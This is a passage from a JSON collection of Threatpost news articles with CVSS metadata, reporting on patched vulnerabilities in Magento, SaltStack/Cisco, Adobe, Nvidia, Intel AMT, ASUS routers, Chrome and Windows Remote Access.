"href": "https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:29:14", "description": "The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.\n\nWhile the company didn\u2019t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the [Magecart association of threat groups](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>), which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nThe vulnerability ([CVE-2019-8144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8144>)), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant\u2019s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw affects Magento 2.3, and was patched in in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, [released in October](<https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update>). The company warned that patching will have the side effect of \u201cblocking administrators from viewing previews for products, blocks and dynamic blocks\u2019; but, it said it will re-enable the preview functionality as soon as possible.\n\n[](<https://register.gotowebinar.com/register/3127445778613605890?source=ART>)\n\n\u201cWe recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,\u201d Piotr Kaminski of the Magento security team wrote [in a posting](<https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability>) on Monday. \u201cApplying this hot fix or upgrading\u2026will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.\u201d\n\nThe same update patches several other critical emote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (CSS) issues.\n\nThe warning comes as Magecart activity and infrastructure continues to saturate the web. According to [analysis from RiskIQ](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart\u2019s javaScript binaries, with over 18,000 e-commerce hosts directly breached.\n\n\u201cIt is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,\u201d said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. \u201cAs a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.\u201d\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T18:13:18", "type": "threatpost", "title": "Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-8144", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-12T18:13:18", "id": "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "href": "https://threatpost.com/magento-warns-upgrade-asap/150115/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:14", "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws incorporated in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco said that the update is \u201ccritical,\u201d ranking it 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet \u2014 and warned that exploits in the wild are imminent.\n\nThose predictions have proved true: In the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure to launch a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6) if the salt-master service is enabled \u201cthe exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server &gt; Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-28T20:51:25", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:10", "description": "Adobe has issued unscheduled patches for two critical vulnerabilities that, if exploited, enable an attacker to execute remote code on targeted devices.\n\nThe two apps affected by the critical flaws are Adobe After Effects, a visual effects and motion graphics app used for post-production film making and video game production, and Adobe Media Encoder, an application to help with media processing requirements for audio and video.\n\n\u201cBoth vulnerabilities can be exploited by a remote, unauthenticated attacker via the internet, and both exist \u201cdue to a boundary error when processing untrusted input,\u201d according to an [analysis of the flaws](<https://www.cybersecurity-help.cz/vdb/SB2020022010?affChecked=1>) after they were disclosed Wednesday evening. \u201cA remote attacker can create a specially crafted file, trick the victim into opening it using the affected software, trigger out-of-bounds write and execute arbitrary code on the target system.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAdobe After Effects has an out-of-bounds write flaw ([CVE-2020-3765](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3765>)), which stems from write operations that then produce undefined or unexpected results. This could enable arbitrary code execution, according to [Adobe\u2019s update](<https://helpx.adobe.com/security/products/after_effects/apsb20-09.html>). Adobe After Effects versions 16.1.2 and earlier (for Windows) are affected. Users need to update to version 17.0.3, available on both Windows and macOS.\n\nWhile the vulnerability is critical in severity, the update has a priority 3 rating, which according to Adobe \u201cresolves vulnerabilities in a product that has historically not been a target for attackers. Adobe recommends administrators install the update at their discretion.\u201d\n\nThe other vulnerability, in Adobe Media Encoder, is also a critical out-of-bounds write vulnerability ([CVE-2020-3764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3764>)) that could enable arbitrary code execution. Adobe Media Encore versions 14.0 and earlier (for Windows) are impacted; the patched version is 14.0.2 (also in a \u201cpriority 3\u201d update).\n\n\u201cThe Media Encoder is a relatively straightforward open-and-own scenario,\u201d Dustin Childs, manager with Trend Micro\u2019s Zero Day Initiative (which discovered the flaw), told Threatpost. \u201cThe issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process.\u201d\n\nMatt Powell (for CVE-2020-3765) and Francis Provencher (for CVE-2020-3764) with Trend Micro\u2019s Zero Day Initiative were credited for discovering these vulnerabilities. Adobe said it is not aware of any exploits in the wild for flaws.\n\nThese latest patches come a week after Adobe [issued its regularly scheduled fixes](<https://threatpost.com/adobe-security-update-critical-flash-framemaker-flaws/152782/>) for February, which stomped out flaws tied to 42 CVEs. Thirty-five of those flaws were critical in severity, including ones that affected its Framemaker and Flash Player products, which, if exploited, could lead to arbitrary code-execution. And, in [Adobe\u2019s January security update](<https://threatpost.com/adobe-patches-critical-illustrator-cc-flaws/151812/>), it addressed nine vulnerabilities overall, including ones in Adobe Illustrator CC and Adobe Experience Manager.\n", "cvss3": {}, "published": "2020-02-20T13:26:32", "type": "threatpost", "title": "Critical Adobe Flaws Fixed in Out-of-Band Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3764", "CVE-2020-3765"], "modified": "2020-02-20T13:26:32", "id": "THREATPOST:C7447BBBEA06E3A901BB1A9A66AB85FF", "href": "https://threatpost.com/critical-adobe-flaws-fixed-in-out-of-band-update/153060/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:31", "description": "Nvidia issued patches for high-severity vulnerabilities in its graphics driver, which can be exploited by a local attacker to launch denial-of-service (DoS) or code-execution attacks.\n\nNvidia\u2019s graphics processing unit (GPU) display driver is used in devices targeted for enthusiast gamers; it\u2019s the software component that enables the device\u2019s operating system and programs to use its high-level graphics hardware. Specifically impacted are display drivers used in GeForce, Quadro and Tesla-branded GPUs for Windows.\n\nThe most severe flaw exists in the control panel component of the graphics driver, which is a utility program helping users monitor and adjust the settings of their graphics adapter. According to [Nvidia](<https://nvidia.custhelp.com/app/answers/detail/a_id/4996>) in its security advisory, published Friday, an attacker with local system access can corrupt a system file in the control panel, which would lead to DoS or escalation of privileges.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE\u20112020\u20115957](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-5957>)) ranks 8.4 out of 10.0 on the CVSS scale, making it high-severity.\n\nAnother vulnerability, this one medium-severity, exists in the control panel of the graphics driver ([CVE\u20112020\u20115958](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-5958>)). An attacker with local system access could exploit this flaw by planting a malicious dynamic link library (DLL) file in the control panel, which may lead to code execution, DoS or information disclosure.\n\nFor both flaws in the graphics driver, the affected versions and subsequent patched versions are listed below. Patched versions are now available, with the exception of a patch for vulnerable R440 versions of Tesla for Windows; fixes for that will be available on the week of March 9.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/02145301/nvidia.png>)\n\nNvidia also disclosed several vulnerabilities in the Virtual GPU (vGPU) Manager, its tool that enables multiple virtual machines to have simultaneous, direct access to a single physical GPU, while also using Nvidia graphics drivers deployed on non-virtualized operating systems.\n\nThe most severe of these flaws exists in the vGPU plugin, \u201cin which an input index value is incorrectly validated, which may lead to denial of service,\u201d according to Nvidia. The vulnerability ([CVE\u20112020\u20115959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5959>)) is 7.8 out of 10.0 on the CVSS scale, making it high-severity.\n\nAnother medium-severity flaw ([CVE-2020-5960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5960>)) in vGPU stems from the tool\u2019s kernel mode (nvidia.ko) which is vulnerable to a null pointer dereference error. This type of error occurs when a program attempts to read or write to memory with a null pointer, causing a segmentation fault. The flaw can lead to denial of service, according to Nvidia.\n\nNvidia also addressed a medium-severity vulnerability in its vGPU graphics driver for guest operating systems. An \u201cincorrect resource clean up on a failure path\u201d in this driver can impact the guest virtual machine, leading to denial of service. A variety of versions are affected for these vGPU software flaws (they can be found [here](<https://nvidia.custhelp.com/app/answers/detail/a_id/4996>)); Nvidia said that updated versions are upcoming in March.\n\nIt\u2019s only the latest Nvidia security patch impacting its gaming-enthusiast customer base. Nvidia last year issued fixes for [high-severity flaws](<https://threatpost.com/gamers-hit-with-nvidia-gpu-driver-geforce-flaws/149992/>) in two popular gaming products, including its graphics driver for Windows and GeForce Experience. The flaws could be exploited to launch an array of malicious attacks \u2013 from DoS to escalation of privileges. Also in 2019, [Nvidia patched](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) another high-severity vulnerability in its GeForce Experience software, which could lead to code-execution or DoS of products, if exploited.\n", "cvss3": {}, "published": "2020-03-02T21:59:19", "type": "threatpost", "title": "Gamer Alert: Serious Nvidia Flaw Plagues Graphics Driver", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5957", "CVE-2020-5958", "CVE-2020-5960"], "modified": "2020-03-02T21:59:19", "id": "THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "href": "https://threatpost.com/gamer-alert-serious-nvidia-flaw-plagues-graphics-driver/153380/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:14:13", "description": "Intel patched a critical privilege escalation vulnerability in its [Active Management Technology](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) (AMT), which is used for remote out-of-band management of PCs.\n\nAMT is part of the Intel vPro platform (Intel\u2019s umbrella marketing term for its collection of computer hardware technologies) and is primarily used by enterprise IT shops for remote management of corporate systems. The flaw can be exploited by an unauthenticated attacker on the same network, in order to gain escalated privileges. The issue ([CVE-2020-8758](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8758>)), found internally by Intel employees, ranks 9.8 out of 10 on the CVSS scale, making it critical severity, according to Intel in a [Tuesday security advisory.](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00404.html>)\n\n\u201cWhile we are not aware of the AMT issue being used in active attacks, Intel has provided detection guidance to various security vendors who have released signatures into their intrusion detection/prevention products as an extra measure to help protect customers as they plan their deployment of this update,\u201d Jerry Bryant, director of communications with Intel Product Assurance and Security, [said in a security advisory posted Tuesday](<https://blogs.intel.com/technology/2020/09/intel-september-2020-security-advisories/#gs.f1r5rk>).\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\nThe flaw stems from improper buffer restrictions in a third party component network subsystem within Intel AMT (and Intel\u2019s Standard Manageability solution, ISM, which has a similar function as AMT).\n\nOne important factor that impacts how difficult the flaw is to exploit is whether or not AMT is \u201cprovisioned.\u201d In order to use AMT, systems must go through a process called \u201cprovisioning.\u201d This process is used to connect the computer to a remote computer used to manage it (for instance, inserting a specially formatted USB drive).\n\nIf AMT is provisioned, it may allow an unauthenticated user to potentially enable escalation of privilege via network access. However, an attacker would need to be authenticated and have local access to exploit the flaw if the AMT system is unprovisioned (if the system is unprovisioned, the flaw also has a lower CVSS score of 7.8 out of 10).\n\n\u201cIf the platform is configured to use Client Initiated Remote Access (CIRA) and environment detection is set to indicate that the platform is always outside the corporate network, the system is in CIRA-only mode and is not exposed to the network vector,\u201d said Bryant.\n\nAffected are Intel AMT and Intel ISM versions before 11.8.79, 11.12.79, 11.22.79, 12.0.68 and 14.0.39.\n\n\u201cIntel recommends that users of Intel AMT and Intel ISM update to the latest version provided by the system manufacturer that addresses these issues,\u201d according to Intel\u2019s advisory.****\n\nIntel AMT has had security issues before. [Earlier in June](<https://threatpost.com/critical-intel-flaws-fixed-in-active-management-technology/156458/>), Intel patched two critical flaws ([CVE-2020-0594](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0594>) and [CVE-2020-0595](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0595>)) exist in the IPv6 subsystem of AMT. The flaws could potentially enable an unauthenticated user to gain elevated privileges via network access. And, a loophole in 2018 found in AMT [was discovered](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) that could have allowed an attacker to bypass logins and place backdoors on laptops, allowing adversaries remote access to laptops.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-08T20:34:34", "type": "threatpost", "title": "Critical Intel Active Management Technology Flaw Allows Privilege Escalation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0594", "CVE-2020-0595", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-8758"], "modified": "2020-09-08T20:34:34", "id": "THREATPOST:FB2955E1812C33ECF441EDAEC41F4022", "href": "https://threatpost.com/critical-intel-active-management-technology-flaw-allows-privilege-escalation/159036/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:19", "description": "A pair of flaws in ASUS routers for the home could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\nThe bugs are specifically found in the RT-AC1900P whole-home Wi-Fi model, within the router\u2019s firmware update functionality. Originally uncovered by Trustwave, ASUS has issued patches for the bugs, and owners are urged to apply the updates as soon as they can.\n\nThe first issue (CVE-2020-15498) stems from a lack of certificate checking.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe router uses [GNU Wget](<https://www.gnu.org/software/wget/>) to fetch firmware updates from ASUS servers. It\u2019s possible to log in via SSH and use the Linux/Unix [\u201cgrep\u201d command](<https://www.geeksforgeeks.org/grep-command-in-unixlinux/>) to search through the filesystem for a specific string that indicates that the vulnerability is present: \u201c\u2013no-check-certificate.\u201d\n\nIn vulnerable versions of the router, the files containing that string are shell scripts that perform downloads from the ASUS update servers, according to [Trustwave\u2019s advisory](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440>), issued on Thursday. This string indicates that there\u2019s no certificate checking, so an attacker could use untrusted (forged) certificates to force the install of malicious files on the targeted device.\n\nAn attacker would need to be connected to the vulnerable router to perform a man in the middle attack (MITM), which would allow that person complete access to all traffic going through the device.\n\nThe latest firmware eliminates the bug by not using the Wget option anymore.\n\nThe second bug (CVE-2020-15499) is a cross-site scripting (XSS) vulnerability in the Web Management interface related to firmware updates, according to Trustwave.\n\n\u201cThe release notes page did not properly escape the contents of the page before rendering it to the user,\u201d explained the firm. \u201cThis means that a legitimate administrator could be attacked by a malicious party using the first MITM finding and chaining it with arbitrary JavaScript code execution.\u201d\n\nASUS fixed this in the latest firmware so that the release notes page no longer renders arbitrary contents verbatim.\n\n\u201cSince routers like this one typically define the full perimeter of a network, attacks targeting them can potentially affect all traffic in and out of your network,\u201d warned Trustwave.\n\nASUS patched the issues in firmware version 3.0.0.4.385_20253.\n\nThe bug disclosure comes less than two weeks after a [bombshell security review](<https://threatpost.com/report-most-popular-home-routers-have-critical-flaws/157346/>) of 127 popular home routers found most contained at least one critical security flaw, according to researchers. Not only did all of the routers the researchers examined have flaws, many \u201care affected by hundreds of known vulnerabilities,\u201d the researchers said.\n\nOn average, the routers analyzed\u2013\u2014by vendors such as D-Link, Netgear, ASUS, Linksys, TP-Link and Zyxel\u2014were affected by 53 critical-rated vulnerabilities (CVE), with even the most \u201csecure\u201d device of the bunch having 21 CVEs, according to the report. Researchers did not list the specific vulnerabilities.\n", "cvss3": {}, "published": "2020-07-23T16:04:30", "type": "threatpost", "title": "ASUS Home Router Bugs Open Consumers to Snooping Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15498", "CVE-2020-15499", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-07-23T16:04:30", "id": "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "href": "https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:21:53", "description": "On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days.\n\nOverall, eight security bugs were addressed in Chrome [browser version 80.0.3987.162](<https://www.us-cert.gov/ncas/current-activity/2020/04/01/google-releases-security-updates-chrome>) for Windows, Mac, and Linux. The most severe of these flaws could allow for arbitrary code execution, according to the Center for Internet Security (CIS).\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,\u201d according to CIS [in a Wednesday alert](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2020-044/>). \u201cDepending on the privileges associated with the application, an attacker could view, change, or delete data. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>) \nAs is typical for Chrome updates, Google is initially scant in details of the bugs \u201cuntil a majority of users are updated with a fix.\u201d It did outline three of the vulnerabilities that were discovered by external researchers, however.\n\nThese included [two high-severity vulnerabilities](<https://chromereleases.googleblog.com/2020/03/stable-channel-update-for-desktop_31.html>) the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications.\n\nThe flaws tied to CVE-2020-6450 and CVE-2020-6451 are both [use-after-free flaws](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>). Use after free is a memory corruption flaw where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code.\n\n[According to vulnerability database Vuldb](<https://vuldb.com/?id.152684>), the flaw tied to CVE-2020-6450 could be exploited remotely and no form of authentication is required for exploitation. Both flaws were reported by Man Yue Mo of GitHub Security Lab on March 17.\n\nAnother vulnerability was discovered in the Media component of Chrome, which displays video and audio in browsers. The vulnerability (CVE-2020-6452) is a heap-based buffer overflow. A [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) attack exists when a buffer (a region in physical memory storage used to temporarily store data) is allocated in the heap portion of memory (a region of process\u2019s memory which is used to store dynamic variables). That excess data in turn corrupts nearby space in memory and could alter other data, opening the door for malicious attacks. This flaw was reported by a researcher under the alias \u201casnine\u201d on March 9.\n\nThe CIS alert recommended that Chrome users \u201capply the stable channel update provided by Google to vulnerable systems immediately after appropriate testing.\u201d\n\nChrome has plagued by vulnerabilities over the past few months. Google [in February 2020 said](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>) it patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affected versions of Chrome running on the Windows, macOS and Linux platforms.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-02T21:19:27", "type": "threatpost", "title": "Google Squashes High-Severity Flaws in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6450", "CVE-2020-6451", "CVE-2020-6452"], "modified": "2020-04-02T21:19:27", "id": "THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "href": "https://threatpost.com/google-squashes-high-severity-flaws-in-chrome-browser/154424/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:01", "description": "Microsoft has released an out-of-band security update addressing two high-severity elevation-of-privilege (EoP) bugs. Both flaws exist in a service called Windows Remote Access, which provides remote-access capabilities to client applications on computers running Windows.\n\nOf note, both flaws were originally disclosed Aug. 11, during Microsoft\u2019s regularly scheduled Patch Tuesday updates, where the tech giant [patched 120 vulnerabilities overall.](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>) During those updates, fixes for the two flaws were issued for Windows 10, Windows 7, Windows Server 2008, 2012, 2016, and 2019; as well as Windows Server (versions 1903, 1909 and 2004). Wednesday\u2019s unscheduled updates fix the vulnerabilities in Windows 8.1 and Windows Server 2012.\n\n\u201cMicrosoft is announcing the availability of security update 4578013 for all supported versions of Microsoft 8.1 and Windows Server 2012 R2,\u201d according to [Microsoft\u2019s Wednesday advisory.](<https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#461>) \u201cCustomers running Windows 8.1 or Server 2012 R2 should install the update for their product to be protected from this vulnerability. Customers running other versions of Microsoft Windows or Windows Server do not need to take any action.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe first vulnerability ([CVE-2020-1530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1530>)) stems from Windows Remote Access improperly handling memory. To exploit this vulnerability, an attacker would first need the ability to execute code on a target\u2019s system. An attacker could then run a specially crafted application to elevate privileges.\n\nThe flaw has a CVSS score of 7.8 out of 10, making it \u201cimportant\u201d in severity. However, it has not been observed in the wild being exploited, and Microsoft said that exploitation of the bug is \u201cless likely\u201d due to attackers needing to first be able to execute code to launch the attack. Symeon Paraschoudis of Pen Test Partners was credited with discovering the flaw.\n\n\u201cThe security update addresses the vulnerability by correcting how Windows Remote Access handles memory,\u201d according to Microsoft.\n\nThe second EoP flaw ([CVE-2020-1537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1537>)), reported anonymously, stems from the Windows Remote Access service improperly handling file operations.\n\n\u201cTo exploit the vulnerability, an attacker would first need code execution on a victim system,\u201d according to Microsoft. \u201cAn attacker could then run a specially crafted application.\u201d\n\nAn attacker who successfully exploited this flaw could gain elevated privileges.The security update addresses the vulnerability by ensuring the Windows Remote Access properly handles file operations. This flaw also had a CVSS score of 7.8 out of 10 making it \u201cimportant\u201d severity, but has not been exploited.\n\nThe fixes come a week after Microsoft issued patches for two flaws under active attack as part of [its Patch Tuesday updates](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>): One of the flaws ([CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>)), a Windows-spoofing bug tied to the validation of file signatures, allows an adversary to \u201cbypass security features intended to prevent improperly signed files from being loaded.\u201d The second ([CVE-2020-1380)](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1380>), a remote code-execution bug, is tied to the Internet Explorer web browser. A successful hack gives the attacker same user rights as the current user, the company wrote.\n\n_It\u2019s the age of remote working, and businesses are facing new 